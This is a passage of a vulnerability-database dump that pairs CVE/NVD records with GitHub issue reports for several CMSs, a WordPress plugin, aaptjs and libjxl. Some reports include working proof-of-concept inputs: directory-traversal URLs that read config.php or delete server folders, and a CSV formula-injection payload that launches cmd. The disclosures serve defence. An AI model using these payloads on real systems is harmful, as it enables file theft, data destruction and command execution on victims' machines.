A vulnerability exists within the FileManagerController.php function in FrogCMS 0.9.5 which allows an attacker to perform a directory traversal attack via a GET request urlencode parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/philippe/FrogCMS/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/philippe/FrogCMS/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frogcms_project:frogcms:0.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "1B03397C-68B4-4C54-B001-8B5BC5FE427A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/philippe/FrogCMS/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "philippe", "FrogCMS" ]
There is a directory traversal vulnerability when logined as a admin and view the uploaded files.An attacker can read arbitrarily file on a remote server via GET request urlencode parameter. 1.Read config.php. ``` http://127.0.0.1:8888/FrogCMS/admin/?/plugin/file_manager/view/.%2f%2f./config.php ``` ![image](https://user-images.githubusercontent.com/30497080/93117069-d38c6980-f6f0-11ea-9913-5dcbc05538b6.png) 2.Read index.php. ``` http://127.0.0.1:8888/FrogCMS/admin/?/plugin/file_manager/view/.%2f%2f./index.php ``` ![image](https://user-images.githubusercontent.com/30497080/93117258-25cd8a80-f6f1-11ea-83c2-82f133f6fe09.png)
FrogCMSv0.9.5 Directory Traversal Vulnerability
https://api.github.com/repos/philippe/FrogCMS/issues/34/comments
3
2020-09-14T17:17:47Z
2021-04-20T01:22:39Z
https://github.com/philippe/FrogCMS/issues/34
701,282,922
34
2,727
CVE-2020-25873
2021-10-29T20:15:07.983
A directory traversal vulnerability in the component system/manager/class/web/database.php was discovered in Baijiacms V4 which allows attackers to arbitrarily delete folders on the server via the "id" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/baijiacms/baijiacmsV4/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/baijiacms/baijiacmsV4/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:baijiacms_project:baijiacms:4:*:*:*:*:*:*:*", "matchCriteriaId": "BE184151-E7CF-41A9-A6E1-68E0C8236382", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/baijiacms/baijiacmsV4/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "baijiacms", "baijiacmsV4" ]
Directory traversal vulnerability in baijiacmsV4 allows remote authenticated attackers to delete arbitrary folders on the server via unspecified vectors. Vulnerable code is in system/manager/class/web/database.php ``` if($operation=='delete') { $d = base64_decode($_GP['id']); $path = WEB_ROOT . '/config/data_backup/'; if(is_dir($path . $d)) { rmdirs($path . $d); message('备份删除成功!', create_url('site', array('act' => 'manager','do' => 'database','op'=>'restore')),'success'); } } ``` The origin request is `http://127.0.0.1:8888/baijiacms/index.php?mod=site&act=manager&do=database&op=delete&id=MTYwMDQ5ODY5OV9RejQzQmhaOQ%3D%3D&beid=1`,which is used to delete database backuped folder.We can change the parameter "id" to delete any folders. For example: 1. Create a folder named test ![image](https://user-images.githubusercontent.com/30497080/93662183-c96fbf80-fa90-11ea-9f0b-3f1e79cb1c38.png) 2. Base64encode "../../test" ![image](https://user-images.githubusercontent.com/30497080/93662206-0c319780-fa91-11ea-8c05-ea4f18301175.png) 3. Change the parameter id to "Li4vLi4vdGVzdA%3d%3d" and request this url "http://127.0.0.1:8888/baijiacms/index.php?mod=site&act=manager&do=database&op=delete&id=Li4vLi4vdGVzdA%3d%3d&beid=1" ![image](https://user-images.githubusercontent.com/30497080/93662276-8b26d000-fa91-11ea-98df-c7aa45facac0.png) 4. Now the test folder is deleted. ![image](https://user-images.githubusercontent.com/30497080/93662294-a8f43500-fa91-11ea-8641-d17ff59a5916.png) 5. An authenticated attacker can destroy the whole website just use the parameter "../../../" after base64encode.
baijiacmsV4 directory traversal vulnerability
https://api.github.com/repos/baijiacms/baijiacmsV4/issues/6/comments
0
2020-09-19T08:11:29Z
2020-09-19T08:11:29Z
https://github.com/baijiacms/baijiacmsV4/issues/6
704,832,797
6
2,728
CVE-2020-25881
2021-10-29T20:15:08.220
A vulnerability was discovered in the filename parameter in pathindex.php?r=cms-backend/attachment/delete&sub=&filename=../../../../111.txt&filetype=image/jpeg of the master version of RKCMS. This vulnerability allows for an attacker to perform a directory traversal via a crafted .txt file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://www.ranko.cn/index.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://gitee.com/wuxi_ranko/cms" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AubreyJun/cms/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://www.ranko.cn/index.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://gitee.com/wuxi_ranko/cms" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AubreyJun/cms/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ranko:rkcms:-:*:*:*:*:*:*:*", "matchCriteriaId": "C6F02F3E-07F3-4477-8228-52FF777F3CE8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/AubreyJun/cms/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "AubreyJun", "cms" ]
### 1 Deploy the RKCMS locally ### 2 Create a file, such as 111.txt ![图片](https://user-images.githubusercontent.com/51948796/93195715-24956f80-f77c-11ea-9c8b-8c5abfde9d77.png) ### 3 Log in the application ### 4 Delete a attachment,apture this packet ,change the filename parameter to ../../../../111.txt,submit this request ![图片](https://user-images.githubusercontent.com/51948796/93196353-e51b5300-f77c-11ea-90f3-8af8510886a7.png) ![图片](https://user-images.githubusercontent.com/51948796/93196400-f5333280-f77c-11ea-9daa-410dbce17537.png) ### 5 111.txt was deleted ![图片](https://user-images.githubusercontent.com/51948796/93196829-7db1d300-f77d-11ea-982d-93791a9ce367.png) ### 6 The source code for this function is in AttachmentController.php ![图片](https://user-images.githubusercontent.com/51948796/93196972-a8039080-f77d-11ea-9ffe-08a99ae033b8.png) ### 7 filename parameter does not have any filtering ![图片](https://user-images.githubusercontent.com/51948796/93197374-1fd1bb00-f77e-11ea-9fae-b663a359f273.png)
There is a directory traversal vulnerability at attachment deletion
https://api.github.com/repos/AubreyJun/cms/issues/2/comments
0
2020-09-15T10:19:11Z
2020-09-15T10:19:11Z
https://github.com/AubreyJun/cms/issues/2
701,804,336
2
2,729
CVE-2020-25911
2021-10-31T19:15:09.780
A XML External Entity (XXE) vulnerability was discovered in the modRestServiceRequest component in MODX CMS 2.7.3 which can lead to an information disclosure or denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dahua966/Vul_disclose/blob/main/XXE_modxcms.md" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/modxcms/revolution/issues/15237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dahua966/Vul_disclose/blob/main/XXE_modxcms.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/modxcms/revolution/issues/15237" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modx:modx_revolution:2.7.3:*:*:*:*:*:*:*", "matchCriteriaId": "846F6D4B-F455-4BCE-A756-7F1B0FE02456", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/modxcms/revolution/issues/15237
[ "Patch", "Third Party Advisory" ]
github.com
[ "modxcms", "revolution" ]
snipped
XXE Vulnerability
https://api.github.com/repos/modxcms/revolution/issues/15237/comments
7
2020-09-16T14:33:59Z
2020-09-21T01:02:16Z
https://github.com/modxcms/revolution/issues/15237
702,819,250
15,237
2,730
CVE-2020-25912
2021-10-31T19:15:09.857
A XML External Entity (XXE) vulnerability was discovered in symphony\lib\toolkit\class.xmlelement.php in Symphony 2.7.10 which can lead to an information disclosure or denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://symphony.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/symphonycms/symphonycms/issues/2924" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://symphony.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/symphonycms/symphonycms/issues/2924" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getsymphony:symphony:2.7.10:*:*:*:*:*:*:*", "matchCriteriaId": "19FE5DB3-D579-431F-A470-4B9BDDD7BB21", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/symphonycms/symphonycms/issues/2924
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "symphonycms", "symphonycms" ]
https://github.com/symphonycms/symphonycms/blob/master/symphony/lib/toolkit/class.xmlelement.php public static function convertFromXMLString($root_element, $xml) { $doc = new DOMDocument('1.0', 'utf-8'); $doc->loadXML($xml); return self::convertFromDOMDocument($root_element, $doc); } Crafted user input could lead to XXE vulnerability as the external entity is not disabled here.
XXE Vulnerability
https://api.github.com/repos/symphonycms/symphonycms/issues/2924/comments
1
2020-09-21T02:52:43Z
2021-11-01T12:27:42Z
https://github.com/symphonycms/symphonycms/issues/2924
705,248,456
2,924
2,731
CVE-2020-26707
2021-10-31T20:15:07.887
An issue was discovered in the add function in Shenzhim AAPTJS 1.3.1 which allows attackers to execute arbitrary code via the filePath parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/shenzhim/aaptjs/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/shenzhim/aaptjs/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:aaptjs_project:aaptjs:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "17215EC6-90DF-41F4-959C-BA2E37CD1DD4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/shenzhim/aaptjs/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "shenzhim", "aaptjs" ]
It fails to restrict the arbitrary commands in the user input which results in the execution of code(RCE/Information Disclosure/DoS). https://github.com/shenzhim/aaptjs/blob/f9fab0b5c3530a6d117cc4f98732b4b231c7962f/index.js#L18 Raised the same issue in Hackerone as well with POC.: https://hackerone.com/reports/996483
Remote Code Execution(RCE) via insecure command formatting
https://api.github.com/repos/shenzhim/aaptjs/issues/2/comments
0
2020-10-02T12:51:33Z
2020-10-02T12:51:33Z
https://github.com/shenzhim/aaptjs/issues/2
713,597,534
2
2,732
CVE-2020-36503
2021-11-01T09:15:08.257
The Connections Business Directory WordPress plugin before 9.7 does not validate or sanitise some connections' fields, which could lead to a CSV injection issue
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "contact@wpscan.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Connections-Business-Directory/Connections/issues/474" }, { "source": "contact@wpscan.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://wpscan.com/vulnerability/dd394b55-c86f-4fa2-aae8-5903ca0b95ec" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Connections-Business-Directory/Connections/issues/474" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://wpscan.com/vulnerability/dd394b55-c86f-4fa2-aae8-5903ca0b95ec" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:connections-pro:connections_business_directory:*:*:*:*:*:wordpress:*:*", "matchCriteriaId": "A480CA1C-2F8E-4CDE-BE42-D1DE152D729A", "versionEndExcluding": null, "versionEndIncluding": "9.6", "versionStartExcluding": null, "versionStartIncluding": "0.7.3.2", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1236" ]
1236
https://github.com/Connections-Business-Directory/Connections/issues/474
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Connections-Business-Directory", "Connections" ]
## Description CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Which lead to hijacking user’s computer by exploiting with untrusted input. In this plugin, all the input fields of [connections_add](http://localhost/wordpress/wp-admin/admin.php?page=connections_add) are affected. ## Affected Item >Export All feature ## Affected Version >0.7.3.2 <= 9.6 ## Tested With >Wordpress 5.4.1 ## Step to reproduce 1. Login to your website 2. Visit http://localhost/wordpress/wp-admin/admin.php?page=connections_add 3. In the input filed add payload `@SUM(1+1)*cmd|' /C calc'!A0` 4. Visit [Connections Tools](http://localhost/wordpress/wp-admin/admin.php?page=connections_tools) and then click on `Export All` 5. It will download a file `cn-export-all-MM-DD-YYYY.csv` open it with `Microsoft Excel` 6. It will open `CMD` ## Exported CSV File |Entry ID|Order|Entry Type|Visibility|Categories |Family Name|Honorific Prefix |First Name |Middle Name |Last Name |Honorific Suffix |Title |Organization |Department |Contact First Name|Contact Last Name|Home Address &#124; Line One |Home Address &#124; Line Two |Home Address &#124; Line Three |Home Address &#124; Line Four |Home Address &#124; District |Home Address &#124; County |Home Address &#124; City |Home Address &#124; State |Home Address &#124; Zipcode |Home Address &#124; Country |Home Address &#124; Latitude|Home Address &#124; Longitude|Home Address &#124; Visibility|Phone Number|Phone Visibility|Email Address|Email Visibility|Social Url|Social Visibility|Im Uid|Im Visibility|Links Url|Links Title|Links Visibility|Dates Date|Dates Visibility|Biography|Notes|Photo URL|Logo URL| |--------|-----|----------|----------|-------------|-----------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|------------------|-----------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|---------------------------|-----------------------|------------------------|-------------------------|------------|----------------|-------------|----------------|----------|-----------------|------|-------------|---------|-----------|----------------|----------|----------------|---------|-----|---------|--------| |2 |0 |individual|public |Uncategorized| |@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0| | |@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0|@SUM(1+1)*cmd&#124;' /C calc'!A0| | |public | | | | | | | | | | | | | | | | | | All fields are not checked because `getData()` doesn't filter any of the fields. https://github.com/Connections-Business-Directory/Connections/blob/c69ea8df74568c2c86f47c0b0f1adc17a22488e1/includes/export/class.csv-export-batch-all.php#L758-L788 ## Reference > [OWASP CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection) Hopefully, it will fix soon, Let me know if you have any questions. Thanks, @rudSarkar
Connections 0.7.3.2 <= 9.6 CSV Injection
https://api.github.com/repos/Connections-Business-Directory/Connections/issues/474/comments
9
2020-05-29T20:57:44Z
2020-06-24T19:39:58Z
https://github.com/Connections-Business-Directory/Connections/issues/474
627,534,307
474
2,733
CVE-2021-22563
2021-11-01T13:15:07.657
Invalid JPEG XL images using libjxl can cause an out of bounds access on a std::vector<std::vector<T>> when rendering splines. The OOB read access can either lead to a segfault, or rendering splines based on other process memory. It is recommended to upgrade past 0.6.0 or patch with https://github.com/libjxl/libjxl/pull/757
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.6, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 4.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.4, "source": "cve-coordination@google.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve-coordination@google.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/issues/735" }, { "source": "cve-coordination@google.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/pull/757" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/issues/735" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/pull/757" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libjxl_project:libjxl:*:*:*:*:*:*:*:*", "matchCriteriaId": "32E466AA-7CFB-4240-8AC9-D7394B5D9AEF", "versionEndExcluding": "0.6.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libjxl/libjxl/issues/735
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libjxl", "libjxl" ]
Hello, this 161 byte JPEG-XL image, found via fuzz testing, causes a segfault during decoding (using the latest commit on the `main` branch). https://github.com/libjxl/libjxl/files/7348994/fuzz39533.jxl.txt ``` ==1086695==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fb932913530 (pc 0x00000153da11 bp 0x7fb9343f5bb0 sp 0x7fb9343f5b50 T1086698) ==1086695==The signal is caused by a READ memory access. #0 0x153da11 in jxl::N_AVX2::(anonymous namespace)::DrawSegment(jxl::SplineSegment const&, bool, unsigned long, long, long, float* restrict*) libjxl/lib/jxl/splines.cc:86:37 #1 0x153c987 in jxl::N_AVX2::(anonymous namespace)::DrawSegments(jxl::Image3<float>*, jxl::Rect const&, jxl::Rect const&, bool, jxl::SplineSegment const*, unsigned long const*, unsigned long const*) libjxl/lib/jxl/splines.cc:151:5 #2 0x15353f5 in void jxl::Splines::Apply<true>(jxl::Image3<float>*, jxl::Rect const&, jxl::Rect const&) const libjxl/lib/jxl/splines.cc:556:5 #3 0x14de591 in jxl::FinalizeImageRect(jxl::Image3<float>*, jxl::Rect const&, std::__1::vector<std::__1::pair<jxl::Plane<float>*, jxl::Rect>, 